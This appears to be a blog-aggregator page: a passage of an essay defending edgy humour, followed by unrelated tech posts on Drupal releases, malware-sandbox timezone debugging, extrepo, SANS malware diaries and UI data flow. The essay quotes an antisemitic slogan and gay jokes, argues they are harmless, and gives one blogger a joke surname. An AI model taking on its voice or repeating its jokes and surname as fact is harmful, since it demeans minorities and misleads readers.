For example, when the Dutchman is the aggressor, it could be assumed he is seeking some kind of payback for Germany's aggression against the Netherlands. If you tell the version where a German slaps a Dutchman, he might personify unprovoked German aggression. The main reason the joke gets told with nationalities is the same reason it's a nun and an attractive blonde: it adds necessary color to the situation, so the characters (and the audience) can draw all sorts of wrong conclusions instantly.

It is implied that the nationalities are relevant, but never actually stated. It's misdirection to draw you in. The real punchline is that complicated explanations for simple acts of violence are not necessary. A joke about nationalist aggression can instead let you recognize universal themes, through its 4 contradictory perspectives, which bleed into a host of other sensitive topics.

It's important to know the Europe in which such jokes were routinely told was a very different place. The hint is in the "25 guilders" at the start. We didn't always have the Euro, a Customs Union, Schengen-zone visas, and fancy electric trains that connect it all. You only needed to drive a few hours in any direction to arrive at a place where you needed permission to get in, probably didn't speak the language, couldn't tell how much things cost, didn't know the local laws, and couldn't interact with the authorities. Also, these were the same people whose ancestors murdered your ancestors for the last few centuries, but they seemed okay now?

A natural response to having this right on your doorstep was to trivialize and make fun of it. And pretend it was all far away. As if to say: we're all going to be characters in a drama none of us really had any say in, so we may as well have fun with it. Some of these jokes do capture an immense amount of historical and cultural context, for example:

Heaven is where the police are British, the cooks are French, the mechanics German, the lovers Italian and it's all organized by the Swiss.

Hell is where the chefs are British, the mechanics French, the lovers Swiss, the police German and it's all organized by the Italians.

That's a condensed roast of about 150 million people covering at least a century, give or take. Those who crack such jokes don't do so in malice. When the odd Mysterious Stranger actually walked into our town, most of us would be pretty curious and friendly to them. You also wouldn't tell such a joke in front of them, unless you were on good terms (or really bad terms), and had already dropped much of the pretense. The main audience for this was our own tribe, and the goal was to relieve our collective anxiety and fear of the unknown. Letting people in on your jokes about them meant letting them hear something intimate.

In the case of the Belgians and the Dutch, it's right there in the punchlines. Our worry was e.g. that they'd outcompete us with their business acumen. Their worry was e.g. that they'd fail to win against people they considered backwards.

These are universal themes.

Speak Easy

Getting to hear people speak in an unfiltered manner, humorously or not, is an incredibly valuable thing. And I mean for reasons other than quote mining what they said and making them look bad.

One time, I was over at a house of recent friends who didn't yet know I was gay. They were cracking jokes about their gay housemate. The guy apparently used an enormous amount of toilet paper on the regular, which they were attempting to explain by pointing to his assumed sexual activities through the back door. I didn't say anything, certainly didn't want to "come out" then and there. I just laughed along and the moment passed.

There's a certain perspective today that says this was unambiguously homophobic. That such humor is bigoted and degrading to the dignity of the target demographic. That we need to stamp such material with appropriate content warnings, and that those who say it freely should apologize and do penance. That it is not only appropriate but a moral duty to intervene (and conveniently make it all about me in the process).

I for one knew these guys were cracking jokes exactly because they didn't dare bring it up with the person in question. Asking about someone else's toilet issues is not exactly casual small talk. Once you connect humor with taboos, it's really no coincidence that potty humor is a thing.

I also think that if they had known I was gay, they wouldn't have joked around, or been embarrassed after, and then it would have been a Big Thing. The way it went, a concern about a person they shared a house with could be brought up and made legible. I joined the "one of the guys" dynamic, by understanding its rules, context and intent. I can get the same effect now just by saying something funny and insensitive about gay people behind closed doors, to show that it's not a personal landmine at all.

It's also entirely in line with existing LGBT culture. Drag queens in particular have used sass and mockery as a shield, but no mockery is complete without self-mockery. The Adventures of Priscilla: Queen of the Desert (1994) showed everyone how it's done:

The John Cleese quote about a wiser part short circuiting a closed system of thought sounds dead-on to me.

It also reinforces that humor is entirely contextual, because its goal is to dance on the edge of what is actually permissible to say and think. Whatever the current taboos are, whatever's currently the most closed-minded, that's what comedy is most attracted to.

For a great illustration of this, consider two scenes, two years apart. First, the opening to 1999's American Pie:

The lead character is caught jerking off to illegal TV porn by his conservative parents, and the scene is played mostly straight. Situated in its own time as a mainstream American movie, this was pretty raunchy, and reflected common Christian taboos around teenage sex. Particularly when you factor in the titular American Pie which also ends up losing its virginity. A moment so memorable, NYT dedicated a piece to it 20 years later. If anyone was offended by this at the time, it was people who resembled the parents and found it difficult to think or talk about sex without blushing.

These days though, the people who consider this movie offensive would come from the politically opposite side of the spectrum. Reasons cited include the sexism, the gay jokes, and so on. If you believe the press there's loads of detractors now, but really I think they just wanted an excuse to post a video of a young man pretending to fuck apple pie for the clicks.

What's more interesting is how this scene was itself parodied in 2001's Not Another Teen Movie. There's a lot to say about that film, because it's a meticulous fusion of 1980s and 1990s teenage movie tropes. It takes itself not seriously by taking the source material very seriously, with stellar performances. The opening is a direct homage to American Pie, which turns everything about that scene to 11, and exaggerates beyond proportion:

It makes perfect sense when you consider what the common objection was at the time: on-screen teenage sexuality and an acknowledgement of taboo hormonal urges. Instead of a shy nerdy guy with a sock, we have a fearless girl with a comically large pink vibrator. Everyone walks in on it, even grandma and the local pastor. It ends with a whipped cream bukkake, cue the opening titles. The rest of the movie continues this line of subverting source material while throwing in a heavy dose of potty, sex and other gags. It only misses the mark a few times, really, like when it tries to stretch a Token Black Character joke for the entire movie.

If you thought the butt of this was women, or LGBTs, or black people, you'd be missing the point entirely. It was a middle finger aimed at puritan scolds who also spent their time chastizing alien sideboob in video games they had never even played.

Most importantly, audiences thought it was genuinely hilarious.

The Humorton Window

I've mostly stuck to examples that feel dated now, and in the first case, downright provincial.

Jokes about national rivalry have diminished, for the simple reason that the unknown has diminished. After opening European borders, and harmonizing the economic and legal systems, we have a legible continent where countries can easily and freely compare notes. We don't need to joke about who would run things best anymore, we can just go look at the COVID numbers.

When you still encounter this sort of national humor, it's more in the context of April Fools or "shitposting", like the pair of dueling memes:

G E K O L O N I Z E E R D (Colonized)
G E F E D E R A L I Z E E R D (Federalized)

Usually posted by respectively a Dutchman or a Belgian, referring to Dutch imperialism and Belgian bureaucracy respectively, to signify that one demographic seems particularly dominant in a thread or space. It is only properly used when ironic, otherwise it is simply tiresome.jpg.

Sexual humor has also reduced in relevance, because the internet offers unlimited access to both pornography and genuine sex-ed, removing all the basic taboos around it. Rather than a bunch of confused college dudes wondering exactly how gay sex works, you now have guys who tried watching some of it, didn't get aroused by it, and simply moved on.

There are shifting windows of what it is a) acceptable and b) popular to laugh at. There's also a saying, "To learn who rules over you, simply find out who you are not allowed to criticize." This counts doubly so for "or joke about."

This is commonly and falsely attributed to Voltaire but oddly enough appears to originate from a 1993 essay by an actual, genuine, bona fide white nationalist. TIL.

The question of who said it is of course irrelevant, the question is whether it is true or not. A common refutation is that it is disallowed to mock e.g. the mentally disabled, who clearly do not rule over others. But that's a cop out, because doing so lures out those who do have power to punish people for it, namely all sorts of organizations that ostensibly advance the rights of particular groups.

The problem with this system is that it is driven by attention, not by effectiveness. This is described perfectly in the essay The Toxoplasma of Rage, written by recently unmasked blogger Scott Alexander Ocasio-Cortez. When the actions that are rewarded are those that get the most attention, this tends to amplify rather than reduce tensions between different interest groups, by breeding more resentment.

It also tends to confuse the people who already have means and access with those with need of it. As an example of this dynamic, there was a story here a few years ago: an elderly Jewish woman in distress had called a stand-by nurse (iirc). Upon learning that she was Jewish, the nurse scolded her for the collective sins of Israel against Palestine and was rude and unhelpful. I know about this because the next day it was in every major newspaper, after being highlighted by a Jewish interest organization.

The outcome would be very different if e.g. someone was mistreated because they were homeless or a drug addict. It would be pretty much impossible for someone like that to get any serious restitution or acknowledgement here. Whether you call that being in charge or not, it represents two vastly different tiers of access and service, differentiated purely by whom you are not allowed to generalize against.

Another common refutation of not-Voltaire is the success of comedians like Dave Chappelle or Bill Burr, who both brought new material highly critical of cancel culture and organized "alphabet people" (LGBTQIAA2+). They invited prophesied professional and personal doom, but came out more popular than ever. Ricky Gervais' semi-annual Golden Globes speeches are in a similar vein, with the recurring gag that he'll never be invited again, as he roasts some of the wealthiest people to their faces:

Many correctly point out that none of the comedians' careers or lifestyles are in danger. They are multi-millionaires with successful projects under their belts. That is of course why they get to do it. When people who don't have "fuck you money" or big brass balls crack jokes like that, they make themselves a target, and those with means and motive go in for the kill. The saying is of course "find out who rules over you," not over them.


I find this fascinating because it reveals humor as a sort of "Romulan Neutral Zone" on the edge of the usual political Overton Window. This larger zone covers not just what is acceptable, but also what is currently contested. The jokes are the ammo, but the armor is self-confidence derived from skill and success. Comedians play this game on Nightmare difficulty every show night.

This zone consists of ideas which humor is effective at working its magic on. It alters or refutes our worldview with condensed bursts of hidden wisdom or absurdity. But they must be within our grasp to untangle. Humor's range is subject to its own constraints, such as "Too Soon", "That's NOT Funny", "I'm Going To Hell For Laughing" and "I Don't Get It". These are completely subjective limits, which are negotiated and renegotiated between the joke tellers and their audience. If you don't believe me, take the joke about the 51 straws, and replace "Dutch" with "Jewish".

But if you think that means the Jews rule over you, you're refusing to see how these things actually work. What actually rules over you is people's chronic and miscalibrated fear that you might not be kidding, which occurs in highly variable degrees. This might also be a good explanation for the common saying that if you want to tell people something they don't want to hear, you need to make them laugh, or they'll kill you for saying it. Good humor is a successful mental defense against thinking that is too rigid and dogmatic.

The case of Mark Meechan is highly illustrative. This is the Scot who was convicted of "grossly offensive behavior" for teaching his pug-dog to do a Nazi salute, upon hearing "Gas the Jews". He has always claimed he did it purely to annoy his girlfriend. "Justice" in this case includes a court ruling that "context and intent" are officially irrelevant to the matter, an absolute bombshell in legal precedent. But that's not the most absurd part. It's the BBC documentary on the issue afterwards, in which one of the detractors jokingly asks his own cat if it too wants to "Gas the Jews," before concluding no. By the logic of a British court, he is guilty of the same kind of punishable offense, and the video is the only proof necessary.

They looked at a person whose only crime was to make jokes they found offensive, and they thought this made him a credible threat to their entire way of life. In their panicked response, they actually started destroying one of the fundamental foundations of that way of life. They haven't stopped yet.

It's a joke, but the penny has yet to drop.

* * *

Humor seems to be far from just a random evolutionary quirk, or a meaningless pass-time. It is a fundamental mechanism that we individually and collectively use to sanity check ourselves. Humor highlights the boundaries of where we might be wrong, and it helps us cut through hangups and taboo.

It seems to happen when a joke activates surprising and contradictory signals, all at the same time. If we can successfully resolve them using our larger understanding of the world, we can acknowledge something new and true. This also implies that when humor-police shows up, they are a symptom of a collective lack of understanding and of unacknowledged taboos.

When we ban fun and mockery, we ban challenging insights, and we do so at our own peril.

Cover Image - Chad and Virgin Laughing

Do not assume US still aspires to be a world leader.  Differently put: it is time for a EU army.

She also said: the UK will have to “live with the consequences” of Boris Johnson  ditching Theresa May’s plan to maintain close economic ties with the EU after Brexit.

Answering would a no-deal Brexit be a personal defeat for you? No. It would, of course, be in Britain’s and all EU member states’ interests to achieve an orderly departure. But that can only happen if it is what both sides want.

Her Germany is ready for no matter what. She made it so. And she’s telling you.

June 26, 2020

I get eaten by the worms and … For 2 seconds the drums seem to announce this is just a cover but then the beat changes drastically and you’re left wondering what happened while the different vibe grows on you. You (almost) have goosebumps when the bridge happens and you stop breathing to hear it all and then, after that bridge, everything comes together and you’re floating on those familiar minor 9th chord arpeggio’s and those fabulous voices until all fades out and you hit repeat.

YouTube Video
Watch this video on YouTube.

As part of the cron.weekly newsletter, I want to test the plain-text version of the mail as much as possible.

June 25, 2020

Given the impact of COVID-19 on organizations' budgets, we extended Drupal 7's end-of-life date by one year. Drupal 7 will receive security updates until November 2022, instead of November 2021. For more information, see the official announcement.

Extending the lifetime of Drupal 7 felt like the right thing to do. It's aligned with Drupal's goal to build software that is safe for everyone to use.

I wish more software was well-maintained like Drupal is. We released Drupal 7 almost a decade ago and continue to care for it.

We often recognize those who help innovate or introduce new features. But maintaining existing Open Source software also relies on the contributions of individuals and organizations. Today, I'd like us to praise those who maintain and improve Drupal 7. Thank you!

June 17, 2020

If it’s common to say that “Everything is a Freaking DNS problem“, other protocols can also be the source of problems… NTP (“Network Time Protocol”) is also a good candidate! A best practice is to synchronize all your devices via NTP but also to set up the same timezone! We learn by doing mistakes and I wanted to share this one with you.

After spending time to debug, I finally found why many of the automated submissions to my malware analysis Sandbox failed. It’s was due to the timezone and… NTP!

When you prepare a Sandbox system, it must be based on guest images. These images have to reflect your “environment”: Your classic tools must be installed (Microsoft Office, a PDF reader, a browser, etc). To achieve this, I usually start from a standard Windows image that I clone then fine-tune to match my requirements. The problem is that, by default, the Windows operating system synchronizes itself automatically with the Microsoft NTP servers:

How the guest image is used by the Sandbox system? When your environment is ready, you take a snapshot. Later, to analyze a malicious file, the sandbox system will restore the snapshot, copy the file to it and executed it. The snapshot being some “picture” of the system,, the date & time are also frozen and, when you restore it, it continues to run at the time the snapshot was taken. That’s why, the Sandbox must update the time:

2020-06-04 11:48:17,428 [root] INFO: Date set to: 20200615T00:31:18, timeout set to: 300

(Note that it’s a classic feature. Some malware must be analyzed at a specific time or date to ensure that it will execute properly!)

My last snapshot was created on 2020/06/04 11:48:17 and the analyzis started on 2020/06/15 00:31:18:

2020-06-15 00:31:18,734 [root] DEBUG: Starting analyzer from: C:\tmpv556hytw
2020-06-15 00:31:18,734 [root] DEBUG: Storing results at: C:\FMiZIvH
2020-06-15 00:31:18,734 [root] DEBUG: Pipe server name: \\.\PIPE\nRwJWEHQaG
2020-06-15 00:31:18,734 [root] DEBUG: Python path: C:\Users\user01\AppData\Local\Programs\Python\Python38-32
2020-06-15 00:31:18,734 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-15 00:31:18,734 [root] INFO: Automatically selected analysis package "exe"

But suddenly, I saw this in the log:

2020-06-15 00:31:31,359 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00860000.
2020-06-15 02:32:18,074 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-15 02:32:18,074 [lib.api.process] ERROR: Failed to open terminate event for pid 3392
2020-06-15 02:32:18,074 [root] INFO: Terminate event set for process 3392.
2020-06-15 02:32:18,074 [root] INFO: Created shutdown mutex.
2020-06-15 02:32:19,073 [root] INFO: Shutting down package.
2020-06-15 02:32:19,073 [root] INFO: Stopping auxiliary modules.

You can see that suddenly, the system time was 2h ahead (00:31 to 02:32) and the Sandbox triggered a timeout and stopped the analysis. Why?

The Sandbox is running in UTC (tip: it’s always good to use UTC as a standard timezone to avoid issues when correlating events) but my original Windows guest was running in the CET timezone (UTC+2 with the summertime) and NTP synchronization was left configured by default. When the snapshot is restored, the operating system runs as usual and, at regular intervals, synchronized its internal clock via NTP…

Conclusion: do NOT configured NTP in your Sandbox guest images to save you some headaches with broken analysis!

[The post When NTP Kills Your Sandbox has been first published on /dev/random]

Just over 7 months ago, I blogged about extrepo, my answer to the "how do you safely install software on Debian without downloading random scripts off the Internet and running them as root" question. I also held a talk during the recent "MiniDebConf Online" that was held, well, online.

The most important part of extrepo is "what can you install through it". If the number of available repositories is too low, there's really no reason to use it. So, I thought, let's look what we have after 7 months...

To cut to the chase, there's a bunch of interesting content there, although not all of it has a "main" policy. Each of these can be enabled by installing extrepo, and then running extrepo enable <reponame>, where <reponame> is the name of the repository.

Note that the list is not exhaustive, but I intend to show that even though we're nowhere near complete, extrepo is already quite useful in its current state:

Free software

  • The debian_official, debian_backports, and debian_experimental repositories contain Debian's official, backports, and experimental repositories, respectively. These shouldn't have to be managed through extrepo, but then again it might be useful for someone, so I decided to just add them anyway. The config here uses the alias for CDN-backed package mirrors.
  • The belgium_eid repository contains the Belgian eID software. Obviously this is added, since I'm upstream for eID, and as such it was a large motivating factor for me to actually write extrepo in the first place.
  • elastic: the elasticsearch software.
  • Some repositories, such as dovecot, winehq and bareos contain upstream versions of their respective software. These two repositories contain software that is available in Debian, too; but their upstreams package their most recent release independently, and some people might prefer to run those instead.
  • The sury, fai, and postgresql repositories, as well as a number of repositories such as openstack_rocky, openstack_train, haproxy-1.5 and haproxy-2.0 (there are more) contain more recent versions of software packaged in Debian already by the same maintainer of that package repository. For the sury repository, that is PHP; for the others, the name should give it away.

    The difference between these repositories and the ones above is that it is the official Debian maintainer for the same software who maintains the repository, which is not the case for the others.

  • The vscodium repository contains the unencumbered version of Microsoft's Visual Studio Code; i.e., the codium version of Visual Studio Code is to code as the chromium browser is to chrome: it is a build of the same softare, but without the non-free bits that make code not entirely Free Software.
  • While Debian ships with at least two browsers (Firefox and Chromium), additional browsers are available through extrepo, too. The iridiumbrowser repository contains a Chromium-based browser that focuses on privacy.
  • Speaking of privacy, perhaps you might want to try out the torproject repository.
  • For those who want to do Cloud Computing on Debian in ways that isn't covered by Openstack, there is a kubernetes repository that contains the Kubernetes stack, the as well as the google_cloud one containing the Google Cloud SDK.

Non-free software

While these are available to be installed through extrepo, please note that non-free and contrib repositories are disabled by default. In order to enable these repositories, you must first enable them; this can be accomplished through /etc/extrepo/config.yaml.

  • In case you don't care about freedom and want the official build of Visual Studio Code, the vscode repository contains it.
  • While we're on the subject of Microsoft, there's also Microsoft Teams available in the msteams repository. And, hey, skype.
  • For those who are not satisfied with the free browsers in Debian or any of the free repositories, there's opera and google_chrome.
  • The docker-ce repository contains the official build of Docker CE. While this is the free "community edition" that should have free licenses, I could not find a licensing statement anywhere, and therefore I'm not 100% sure whether this repository is actually free software. For that reason, it is currently marked as a non-free one. Merge Requests for rectifying that from someone with more information on the actual licensing situation of Docker CE would be welcome...
  • For gamers, there's Valve's steam repository.

Again, the above lists are not meant to be exhaustive.

Special thanks go out to Russ Allbery, Kim Alvefur, Vincent Bernat, Nick Black, Arnaud Ferraris, Thorsten Glaser, Thomas Goirand, Juri Grabowski, Paolo Greppi, and Josh Triplett, for helping me build the current list of repositories.

Is your favourite repository not listed? Create a configuration based on template.yaml, and file a merge request!

June 16, 2020

I published the following diary on “Sextortion to The Next Level“:

For a long time, our mailboxes are flooded with emails from “hackers” (note the quotes) who pretend to have infected our computers with malware. The scenario is always the same: They successfully collected sensitive pieces of evidence about us (usually, men visiting adult websites) and request some money to be paid in Bitcoins or they will disclose everything. We already reported this kind of malicious activity for the first time in 2018. Attacks evolved with time and they improved their communication by adding sensitive information like a real password (grabbed from major data leaks) or mobile phones… [Read more]

[The post [SANS ISC] Sextortion to The Next Level has been first published on /dev/random]

Mautic released

A year ago, Acquia acquired Mautic. Mautic is an Open Source marketing automation and campaign management platform.

Some of you have been wondering: What has been going on since the acquisition?. It's high time for an update!

Mautic 3 released

Mautic 3 was released last night. It is the first major release in four years, and a big milestone!

I'd like to extend a big thank you to everyone who contributed to Mautic 3. I'm also proud to say that Acquia was the largest contributor.

For me personally, it was nice to see some long-term Drupal developers contribute to Mautic 3. When Acquia acquired Mautic, I hoped to see cross-pollination between Drupal and Mautic.

A streamlined release model for Mautic 4

The Mautic 3 release was mostly an "under the hood" release. The focus was on upgrading and modernizing Mautic's underlying frameworks (e.g. Symfony and other dependencies).

We want Mautic 4 to offer some much-requested new features. In order to do so, Mautic is switching to a new innovation and release model. Instead of having to wait almost four years for a major release with new features, there will be four Mautic releases with new features each year.

The Drupal community went through a similar transformation five years ago. The Drupal community now brings more value to its users in less time. Because of the faster innovation cycle, Drupal also has more active contributors than ever before.

A quarterly release cycle creates a healthy heartbeat for an Open Source project. You can expect Mautic to deliver improvements more frequently and predictably moving forward.

A streamlined governance model

As a young Open Source project, Mautic was lacking clearly defined roles and responsibilities. For example, it was unclear to many (including me) how the Open Source project and Mautic, Inc., the for-profit company, best collaborated.

With the acquisition by Acquia, the need for clear roles and responsibilities became even more called for.

One of the first things Acquia did post-acquisition was to develop a new governance model in collaboration with the Mautic community.

Mautic's new governance model defines different teams and working groups, how the community and Acquia collaborate, and more. With roles and responsibilities more clearly defined, we can go faster together.

A new project lead

I'm also excited to share that Ruth Cheesley is Mautic's new Project Lead.

Ruth has been involved with Mautic for a long time, and prior to Mautic, was on Joomla!'s Community Leadership Team. She is also a member of Drupal's Community Working Group. Ruth works at Acquia. As she is part of my team, I've been working closely with Ruth for the past 6+ months and could not be more excited about her involvement and new role.

Ruth has the full support of Acquia, Mautic's community leadership team, and DB Hurley, Mautic's founder and previous Project Lead. A big thank you to DB for his leadership and having guided Mautic thus far — getting an Open Source project off the ground and to this stage is no small feat.


With a new governance model, leadership structure, as well as a new release and innovation model for Mautic, we're set up well to accelerate and innovate for the long run.

June 13, 2020

bulky T510 and tiny n135When my Thinkpad x250 broke down last week with what appears to be a motherboard failure, I tried to convince my daughter to hand over her T410 but work-from-home-schooling does not work without a computer, so she refused. Disillusioned in my diminishing parenting powers, I dug up my 10 year old Samsung n135 netbook instead. It still had Ubuntu 14.10 running and the battery was pining for the fjords, but after buying a new battery (€29), updating Ubuntu to 18.04 LTS and switching to Lubuntu it really is usable again.

Now to be honest, I did get replacement laptop (a bulky T510 with only 4GB of RAM) with my own SSD inside from my supplier, so I’m not using that old netbook full-time, but happy to have it running smoothly nonetheless.

The future, to end this old-fashioned geekery off with, will very likely be a Dell XPS-13 9300 (yep, I’ll be cheating on Lenovo) on which I’ll happily install Ubuntu 20.04 LTS on. I’ve upgraded my wife’s x240 to that already and I must say it runs smoothly and looks great when compared to 18.04 which I’m still running.

June 12, 2020

I published the following diary on “Malicious Excel Delivering Fileless Payload“:

Macros in Office documents are so common today that my honeypots and hunting scripts catch a lot of them daily. I try to keep an eye on them because sometimes you can spot an interesting one (read: “using a less common technique”).  Yesterday, I found such a sample that deserve a quick diary… [Read more]

[The post [SANS ISC] Malicious Excel Delivering Fileless Payload has been first published on /dev/random]

June 11, 2020

I published the following diary on “Anti-Debugging JavaScript Techniques“:

For developers who write malicious programs, it’s important to make their code not easy to be read and executed in a sandbox. Like most languages, there are many ways to make the life of malware analysts mode difficult (or more exciting, depending on the side of the table you’re sitting ;-).

Besides being an extremely permissive language with its syntax and making it easy to obfuscate, JavaScript can also implement anti-debugging techniques. A well-known technique is based on the method arguments.callee(). This method allows a function to refer to its own body… [Read more]

[The post [SANS ISC] Anti-Debugging JavaScript Techniques has been first published on /dev/random]

If you’re a bit like me, you’re probably impatient. You want things to move quickly. There’s no time to waste!

June 09, 2020

After more than 2 years of building Oh Dear, I still struggle with the most fundamental question: how are users finding our application and where should we focus our marketing efforts to maximize that?

June 07, 2020

tmux upgrade from 2.8 to 3.0...

# invisible separators
set-option -g pane-border-fg black
set-option -g pane-border-bg black
set-option -g pane-active-border-fg black
set-option -g pane-active-border-bg black


set -g pane-border-style bg=black,fg=black
set -g pane-active-border-style bg=black,fg=black

as mentioned in the changelog.

June 04, 2020

I published the following diary on “Anti-Debugging Technique based on Memory Protection“:

Many modern malware samples implement defensive techniques. First of all, we have to distinguish sandbox-evasion and anti-debugging techniques. Today, sandboxes are an easy and quick way to categorize samples based on their behavior. Malware developers have plenty of tests to perform to detect the environment running their code. There are plenty of them, some examples: testing the disk size, the desktop icons, the uptime, processes, network interfaces MAC addresses, hostnames, etc… [Read more]

[The post [SANS ISC] Anti-Debugging Technique based on Memory Protection has been first published on /dev/random]

This post shares some ideas about working with cronjobs, to help make common tasks more easy for both junior and senior sysadmins.

June 03, 2020

Today, we released Drupal 9.0.0! This is a big milestone because we have been working on Drupal 9 for almost five years.

I updated my site to run Drupal 9 earlier today. It was easy!

As I write this, I'm overwhelmed by feelings of excitement and pride. There is something very special about building and releasing software with thousands of people around the world.

However, I find myself conflicted between today's successful launch and the tragic events in the United States. I can't go about business as usual. Discrimination is the greatest threat to any community, Drupal included.

I have always believed that Drupal is a force for good in the world. People point to our community as one of the largest, most diverse and most supportive Open Source projects in the world. While we make mistakes and can always be better, it's important that we lead by example. That starts with me. I am committing to the community that I will continue to learn more, and fight for equality and justice. I can and will do more. Above all else, it's important to stand in solidarity with Black members of the Drupal community — and the Black community at large.

During this somber time, I remain incredibly proud of our community for delivering Drupal 9. We did this together, as a global community made up of people from different races, ethnicities, genders, and national origins. It gives me some needed positivity.

If you haven't looked at Drupal in a while, I recommend you look again. Compared to Drupal 8.0.0, Drupal 9 is more usable, accessible, inclusive, flexible, and scalable than previous versions. We made so much progress on such important things:

  • Drupal 9 is dramatically easier to use for marketers
  • Drupal 9 is easier to maintain and upgrade for developers
  • Drupal is innovating with its headless or decoupled capabilities

It's hard to describe the amount of innovation and care that went into Drupal since the first release of Drupal 8 almost five years ago. To try and grasp the scale, consider this: more than 4,500 individuals contributed to Drupal core during the past 4.5 years. During that time, the number of active contributors increased by almost 50%. Together, we created the most author-friendly and powerful version of Drupal to date.

Thank you to everyone who made Drupal 9 happen.

June 02, 2020

... isn't ready yet, but it's getting there.

I had planned to release a new version of SReview, my online video review and transcoding system that I wrote originally for FOSDEM but is being used for DebConf, too, after it was set up and running properly for FOSDEM 2020. However, things got a bit busy (both in my personal life and in the world at large), so it fell a bit by the wayside.

I've now also been working on things a bit more, in preparation for an improved administrator's interface, and have started implementing a REST API to deal with talks etc through HTTP calls. This seems to be coming along nicely, thanks to OpenAPI and the Mojolicious plugin for parsing that. I can now design the API nicely, and autogenerate client side libraries to call them.

While at it, because libmojolicious-plugin-openapi-perl isn't available in Debian 10 "buster", I moved the docker containers over from stable to testing. This revealed that both bs1770gain and inkscape changed their command line incompatibly, resulting in me having to work around those incompatibilities. The good news is that I managed to do so in a way that keeps running SReview on Debian 10 viable, provided one installs Mojolicious::Plugin::OpenAPI from CPAN rather than from a Debian package. Or installs a backport of that package, of course. Or, heck, uses the Docker containers in a kubernetes environment or some such -- I'd love to see someone use that in production.

Anyway, I'm still finishing the API, and the implementation of that API and the test suite that ensures the API works correctly, but progress is happening; and as soon as things seem to be working properly, I'll do a release of SReview 0.6, and will upload that to Debian.

Hopefully that'll be soon.

June 01, 2020

I created a PHP package that can make it easier to work with percentages in any PHP application.

May 28, 2020

The reason software isn't better is because it takes a lifetime to understand how much of a mess we've made of things, and by the time you get there, you will have contributed significantly to the problem.
Two software developers pairing up on a Rails app

The fastest code is code that doesn't need to run, and the best code is code you don't need to write. This is rather obvious. Less obvious is how to get there, or who knows. Every coder has their favored framework or language, their favored patterns and practices. Advice on what to do is easy to find. More rare is what not to do. They'll often say "don't use X, because of Y," but that's not so much advice as it is a specific criticism.

The topic interests me because significant feats of software engineering often don't seem to revolve around new ways of doing things. Rather, they involve old ways of not doing things. Constraining your options as a software developer often enables you to reach higher than if you hadn't.

Many of these lessons are hard learned, and in retrospect often come from having tried to push an approach further than it merited. Some days much of software feels like this, as if computing has already been pushing our human faculties well past the collective red line. Hence I find the best software advice is often not about code at all. If it's about anything, it's about data, and how you organize it throughout its lifecycle. That is the real currency of the coder's world.

Usually data is the ugly duckling, relegated to the role of an unlabeled arrow on a diagram. The main star is all the code that we will write, which we draw boxes around. But I prefer to give data top billing, both here and in general.

One-way Data Flow

In UI, there's the concept of one-way data flow, popularized by the now omnipresent React. One-way data flow is all about what it isn't, namely not two-way. This translates into benefits for the developer, who can reason more simply about their code. Unlike traditional Model-View-Controller architectures, React is sold as being just the View.

Expert readers however will note that the original trinity of Model-View-Controller does all flow one way, in theory. Its View receives changes from the Model and updates itself. The View never talks back to the model, it only operates through the Controller.

model view controller

The reason it's often two-way in practice is because there are lots of M's, V's and C's which all need to communicate and synchronize in some unspecified way:

model view controller - data flow

The source of truth is some kind of nebulous Ur-Model, and each widget in the UI is tied to a specific part of it. Each widget has its own local model, which has to bi-directionally sync up to it. Children go through their parent to reach up to the top.

When you flatten this, it starts to look more like this:

model view controller - 2-way data flow

Between an original model and a final view must sit a series of additional "Model Controllers" whose job it is to pass data down and to the right, and vice versa. Changes can be made in either direction, and there is no single source of truth. If both sides change at the same time, you don't know which is correct without more information. This is what makes it two-way.

model view controller - one-way stateless data flow

The innovation in one-way UI isn't exactly to remove the Controller, but to centralize it and call it a Reducer. It also tends to be stateless, in that it replaces the entire Model for every change, rather than updating it in place.

This makes all the intermediate arrows one-way, restoring the original idea behind MVC. But unlike most MVC, it uses a stateless function f: model => views to derive all the Views from the Ur-Model in one go. There are no permanent Views that are created and then set up to listen to an associated Model. Instead Views are pure data, re-derived for every change, at least conceptually.

In practice there is an actual trick to making this fast, namely incrementalism and the React Reconciler. You don't re-run everything, but you can pretend you do. A child is guaranteed to be called again if a parent has changed. But only after giving that parent, and its parents, a chance to react first.

Even if the Views are a complex nested tree, the data flow is entirely one way except at the one point where it loops back to the start. If done right, you can often shrink the controller/reducer to such a degree that it may as well not be there.

Much of the effort in developing UI is not in the widgets but in the logic around them, so this can save a lot of time. Typical MVC instead tends to spread synchronization concerns all over the place as the UI develops, somewhat like a slow but steadily growing cancer.

The solution seems to be to forbid a child from calling or changing the state of its parent directly. Many common patterns in old UI code become impossible and must be replaced with alternatives. Parents do often pass down callbacks to children to achieve the same thing by another name. But this is a cleaner split, because the child component doesn't know who it's calling. The parent can decide to pass-through or decorate a callback given to it by its parent, and this enables all sorts of fun composition patterns with little to no boilerplate.

You don't actually need to have one absolute Ur-Model. Rather the idea is separation of concerns along lines of where the data comes from and what it is going to be used for, all to ensure that change only flows in one direction.

The benefits are numerous because of what it enables: when you don't mutate state bidirectionally, your UI tree is also a data-dependency graph. This can be used to update the UI for you, requiring you to only declare what you want the end result to be. You don't need to orchestrate specific changes to and fro, which means a lot of state machines disappear from your code. Key here is the ability to efficiently check for changes, which is usually done using immutable data.

The merit of this approach is most obvious once you've successfully built a complex UI with it. The discipline it enforces leads to more elegant and robust solutions, because it doesn't let you wire things up lazily. You must instead take the long way around, and design a source of truth in accordance with all its intended derivatives. This forces but also enables you to see the bigger picture. Suddenly features that seemed insurmountably complicated, because they cross-cut too many concerns, can just fall out naturally. The experience is very similar to Immediate Mode UI, only with the ability to decouple more and do async.

If you don't do this, you end up with the typical Object-Oriented system. Every object can be both an actor and can be mutually acted upon. It is normal and encouraged to create two-way interactions with them and link them into cycles. The resulting architecture diagrams will be full of unspecified bidirectional arrows that are difficult to trace, which obscure the actual flows being realized.

Unless they represent a reliable syncing protocol, bidirectional arrows are wishful thinking.

Immutable Data

Almost all data in a computer is stored on a mutable medium, be it a drive or RAM. As such, most introductions to immutable data will preface it by saying that it's kinda weird. Because once you create a piece of data, you never update it. You only make a new, altered copy. This seems like a waste of perfectly good storage, volatile or not, and contradicts every programming tutorial.

Because of this it is mandatory to say that you can reduce the impact of it with data sharing. This produces a supposedly unintuitive copy-on-write system.

